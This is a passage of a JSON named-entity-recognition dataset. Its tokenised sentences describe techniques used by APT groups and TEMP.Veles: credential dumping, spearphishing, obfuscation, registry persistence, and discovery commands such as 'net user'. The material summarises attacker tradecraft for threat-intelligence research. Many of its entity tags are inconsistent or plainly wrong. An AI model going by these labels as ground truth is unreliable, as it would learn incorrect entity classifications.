- "reconnaissance", - "against", - "targets", - "of", - "interest." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Exp", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "used", - "cryptcat", - "binaries", - "to", - "encrypt", - "their", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "modified", - "files", - "based", - "on", - "the", - "open-source", - "project", - "cryptcat", - "in", - "an", - "apparent", - "attempt", - "to", - "decrease", - "anti-virus", - "detection", - "rates." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "used", - "Mimikatz." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "B-OffAct", - "O", - "B-Idus", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "developed,", - "prior", - "to", - "the", - "attack,", - "malware", - "capabilities", - "that", - "would", - "require", - "access", - "to", - "specific", - "and", - "specialized", - "hardware", - "and", - "software." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Exp", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "renamed", - "files", - "to", - "look", - "like", - "legitimate", - "files,", - "such", - "as", - "Windows", - "update", - "files", - "or", - "Schneider", - "Electric", - "application", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-OffAct", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "used", - "a", - "publicly", - "available", - "PowerShell-based", - "tool,", - "WMImplant." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "O", - "I-OffAct", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "installed", - "scheduled", - "tasks", - "defined", - "in", - "XML", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Exp", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "used", - "tools", - "such", - "as", - "Mimikatz", - "and", - "other", - "open-source", - "software." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "I-OffAct", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "captured", - "credentials", - "as", - "they", - "were", - "being", - "changed", - "by", - "redirecting", - "text-based", - "login", - "codes", - "to", - "websites", - "they", - "controlled." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "downloaded", - "binary", - "data", - "from", - "a", - "specified", - "domain", - "after", - "the", - "malicious", - "document", - "is", - "opened." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "prompted", - "victims", - "to", - "accept", - "macros", - "in", - "order", - "to", - "execute", - "the", - "subsequent", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "disguised", - "its", - "scheduled", - "tasks", - "as", - "those", - "used", - "by", - "Google." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "used", - "port", - "4050", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "used", - "ConfuserEx", - "to", - "obfuscate", - "its", - "variant", - "of", - "Imminent", - "Monitor,", - "compressed", - "payload", - "and", - "RAT", - "packages,", - "and", - "password", - "protected", - "encrypted", - "email", - "attachments", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "used", - "a", - "macro", - "function", - "to", - "set", - "scheduled", - "tasks,", - "disguised", - "as", - "those", - "used", - "by", - "Google." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "used", - "spearphishing", - "emails", - "with", - "password", - "protected", - "RAR", - "attachment", - "to", - "avoid", - "being", - "detected", - "by", - "the", - "email", - "gateway." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "APT-C-36", - "obtained", - "and", - "used", - "a", - "modified", - "variant", - "of", - "Imminent", - "Monitor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT-C-36", - "has", - "embedded", - "a", - "VBScript", - "within", - "a", - "malicious", - "Word", - "document", - "which", - "is", - "executed", - "upon", - "the", - "document", - "opening." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "used", - "RAR", - "to", - "compress", - "files", - "before", - "moving", - "them", - "outside", - "of", - "the", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "used", - "a", - "batch", - "script", - "to", - "perform", - "a", - "series", - "of", - "discovery", - "techniques", - "and", - "saves", - "it", - "to", - "a", - "text", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "collected", - "files", - "from", - "a", - "local", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "registered", - "hundreds", - "of", - "domains", - "for", - "use", - "in", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "hijacked", - "FQDNs", - "associated", - "with", - "legitimate", - "websites", - "hosted", - "by", - "hop", - "points." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "created", - "email", - "accounts", - "for", - "later", - "use", - "in", - "social", - "engineering,", - "phishing,", - "and", - "when", - "registering", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "been", - "known", - "to", - "use", - "credential", - "dumping", - "using", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT1", - "used", - "the", - "commands", - "<code>net", - "localgroup</code>,<code>net", - "user</code>,", - "and", - "<code>net", - "group</code>", - "to", - "find", - "accounts", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "uses", - "two", - "utilities,", - "GETMAIL", - "and", - "MAPIGET,", - "to", - "steal", - "email.", - "GETMAIL", - "extracts", - "emails", - "from", - "archived", - "Outlook", - ".pst", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT1", - "used", - "publicly", - "available", - "malware", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "file", - "name", - "AcroRD32.exe,", - "a", - "legitimate", - "process", - "name", - "for", - "Adobe's", - "Acrobat", - "Reader,", - "was", - "used", - "by", - "APT1", - "as", - "a", - "name", - "for", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "listed", - "connected", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "APT1", - "group", - "is", - "known", - "to", - "have", - "used", - "pass", - "the", - "hash." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "gathered", - "a", - "list", - "of", - "running", - "processes", - "on", - "the", - "system", - "using", - "<code>tasklist", - "/v</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "APT1", - "group", - "is", - "known", - "to", - "have", - "used", - "RDP", - "during", - "operations." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "uses", - "two", - "utilities,", - "GETMAIL", - "and", - "MAPIGET,", - "to", - "steal", - "email.", - "MAPIGET", - "steals", - "email", - "still", - "on", - "Exchange", - "servers", - "that", - "has", - "not", - "yet", - "been", - "archived." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "hyperlinks", - "to", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "used", - "the", - "<code>ipconfig", - "/all</code>", - "command", - "to", - "gather", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "used", - "the", - "<code>net", - "use</code>", - "command", - "to", - "get", - "a", - "listing", - "on", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "used", - "the", - "commands", - "<code>net", - "start</code>", - "and", - "<code>tasklist</code>", - "to", - "get", - "a", - "listing", - "of", - "the", - "services", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "used", - "various", - "open-source", - "tools", - "for", - "privilege", - "escalation", - "purposes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT1", - "has", - "used", - "the", - "Windows", - "command", - "shell", - "to", - "execute", - "commands,", - "and", - "batch", - "scripting", - "to", - "automate", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT12", - "has", - "used", - "blogs", - "and", - "WordPress", - "for", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT12", - "has", - "used", - "multiple", - "variants", - "of", - "DNS", - "Calculation", - "including", - "multiplying", - "the", - "first", - "two", - "octets", - "of", - "an", - "IP", - "address", - "and", - "adding", - "the", - "third", - "octet", - "to", - "that", - "value", - "in", - "order", - "to", - "get", - "a", - "resulting", - "command", - "and", - "control", - "port." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT12", - "has", - "exploited", - "multiple", - "vulnerabilities", - "for", - "execution,", - "including", - "Microsoft", - "Office", - "vulnerabilities", - "(CVE-2009-3129,", - "CVE-2012-0158)", - "and", - "vulnerabilities", - "in", - "Adobe", - "Reader", - "and", - "Flash", - "(CVE-2009-4324,", - "CVE-2009-0927,", - "CVE-2011-0609,", - "CVE-2011-0611)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "B-Features", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Tool", - "B-Features", - "B-Features", - "B-Features", - "B-Features" - ] - }, - { - "tokens": [ - "APT12", - "has", - "attempted", - "to", - "get", - "victims", - "to", - "open", - "malicious", - "Microsoft", - "Word", - "and", - "PDF", - "attachment", - "sent", - "via", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT12", - "has", - "sent", - "emails", - "with", - "malicious", - "Microsoft", - "Office", - "documents", - "and", - "PDFs", - "attached." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT16", - "has", - "compromised", - "otherwise", - "legitimate", - "sites", - "as", - "staging", - "servers", - "for", - "second-stage", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT17", - "has", - "created", - "and", - "cultivated", - "profile", - "pages", - "in", - "Microsoft", - "TechNet.", - "To", - "make", - "profile", - "pages", - "appear", - "more", - "legitimate,", - "APT17", - "has", - "created", - "biographical", - "sections", - "and", - "posted", - "in", - "forum", - "threads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT17", - "has", - "created", - "profile", - "pages", - "in", - "Microsoft", - "TechNet", - "that", - "were", - "used", - "as", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "actors", - "used", - "the", - "native", - "at", - "Windows", - "task", - "scheduler", - "tool", - "to", - "use", - "scheduled", - "tasks", - "for", - "execution", - "on", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "uses", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "obfuscates", - "strings", - "in", - "the", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "actors", - "leverage", - "legitimate", - "credentials", - "to", - "log", - "into", - "external", - "remote", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "APT18", - "actors", - "deleted", - "tools", - "and", - "batch", - "files", - "from", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "can", - "list", - "files", - "information", - "for", - "specific", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "can", - "upload", - "a", - "file", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "establishes", - "persistence", - "via", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "can", - "collect", - "system", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "actors", - "leverage", - "legitimate", - "credentials", - "to", - "log", - "into", - "external", - "remote", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "APT18", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT18", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "Base64", - "to", - "obfuscate", - "executed", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "downloaded", - "and", - "launched", - "code", - "within", - "a", - "SCT", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT19", - "launched", - "an", - "HTTP", - "malware", - "variant", - "and", - "a", - "Port", - "22", - "malware", - "variant", - "using", - "a", - "legitimate", - "executable", - "that", - "loaded", - "the", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT19", - "HTTP", - "malware", - "variant", - "decrypts", - "strings", - "using", - "single-byte", - "XOR", - "keys." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "performed", - "a", - "watering", - "hole", - "attack", - "on", - "forbes.com", - "in", - "2014", - "to", - "compromise", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "Base64", - "to", - "obfuscate", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "<code>-W", - "Hidden</code>", - "to", - "conceal", - "PowerShell", - "windows", - "by", - "setting", - "the", - "WindowStyle", - "parameter", - "to", - "hidden." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT19", - "uses", - "a", - "Port", - "22", - "malware", - "variant", - "to", - "modify", - "several", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "PowerShell", - "commands", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT19", - "HTTP", - "malware", - "variant", - "establishes", - "persistence", - "by", - "setting", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows", - "Debug", - "Tools-%LOCALAPPDATA%\\</code>." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "Regsvr32", - "to", - "bypass", - "application", - "control", - "techniques." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "configured", - "its", - "payload", - "to", - "inject", - "into", - "the", - "rundll32.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT19", - "sent", - "spearphishing", - "emails", - "with", - "malicious", - "attachments", - "in", - "RTF", - "and", - "XLSM", - "formats", - "to", - "deliver", - "initial", - "exploits." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT19", - "HTTP", - "malware", - "variant", - "used", - "Base64", - "to", - "encode", - "communications", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "collected", - "system", - "architecture", - "information.", - "APT19", - "used", - "an", - "HTTP", - "malware", - "variant", - "and", - "a", - "Port", - "22", - "malware", - "variant", - "to", - "gather", - "the", - "hostname", - "and", - "CPU", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "an", - "HTTP", - "malware", - "variant", - "and", - "a", - "Port", - "22", - "malware", - "variant", - "to", - "collect", - "the", - "MAC", - "address", - "and", - "IP", - "address", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "used", - "an", - "HTTP", - "malware", - "variant", - "and", - "a", - "Port", - "22", - "malware", - "variant", - "to", - "collect", - "the", - "victim’s", - "username." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT19", - "has", - "obtained", - "and", - "used", - "publicly-available", - "tools", - "like", - "Empire." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "APT19", - "used", - "HTTP", - "for", - "C2", - "communications.", - "APT19", - "also", - "used", - "an", - "HTTP", - "malware", - "variant", - "to", - "communicate", - "over", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT19", - "Port", - "22", - "malware", - "variant", - "registers", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "Powershell", - "cmdlet", - "to", - "grant", - "the", - "<code>ApplicationImpersonation</code>", - "role", - "to", - "a", - "compromised", - "account." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "several", - "malicious", - "applications", - "that", - "abused", - "OAuth", - "access", - "tokens", - "to", - "gain", - "access", - "to", - "target", - "email", - "accounts,", - "including", - "Gmail", - "and", - "Yahoo", - "Mail." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Idus" - ] - }, - { - "tokens": [ - "APT28", - "used", - "a", - "publicly", - "available", - "tool", - "to", - "gather", - "and", - "compress", - "multiple", - "documents", - "on", - "the", - "DCCC", - "and", - "DNC", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "variety", - "of", - "utilities,", - "including", - "WinRAR,", - "to", - "archive", - "collected", - "data", - "with", - "password", - "protection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", 